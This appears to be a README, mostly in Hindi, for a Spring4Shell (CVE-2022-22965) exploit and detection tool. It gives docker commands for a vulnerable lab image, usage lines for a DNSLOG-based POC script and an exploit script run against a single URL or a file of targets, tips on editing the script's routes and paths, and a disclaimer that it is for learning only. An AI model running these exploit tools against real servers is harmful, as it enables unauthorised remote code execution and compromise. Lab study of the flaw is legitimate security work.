
Spring-0day/CVE-2022-22965
Spring Framework/CVE-2022-22965
भेद्यता आईडी: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -dit -p 8080:8080 vulfocus/spring-core-rce-2022-03-29

लक्ष्य का पता लगाने के लिए POC का उपयोग करने की अनुशंसा की जाती है। इसका लाभ यह है कि यह DNSLOG के आधार पर सत्यापित करता है कि भेद्यता मौजूद है या नहीं, और यह tomcat के लॉग कॉन्फ़िगरेशन को संशोधित नहीं करेगा।
python3 cve-2022-22965-poc.py -url https://example.com/
python3 cve-2022-22965-poc.py -file file.txt

python3 cve-2022-22965.py -url https://example.com/
python3 cve-2022-22965.py -file file.txt

python3 cve-2022-22965-poc.py -url https://example.com/

python3 cve-2022-22965.py -url http://example.com/

लाइन 13 पर सामान्य रूट्स जोड़ें
routs = ['env',]
लाइन 12 पर सामान्य पाथ जोड़ें
path = ['root',]

केवल सुरक्षित सीखने के लिए, अवैध रूप से उपयोग न करें
केवल सुरक्षित सीखने के लिए, अवैध उपयोग न करें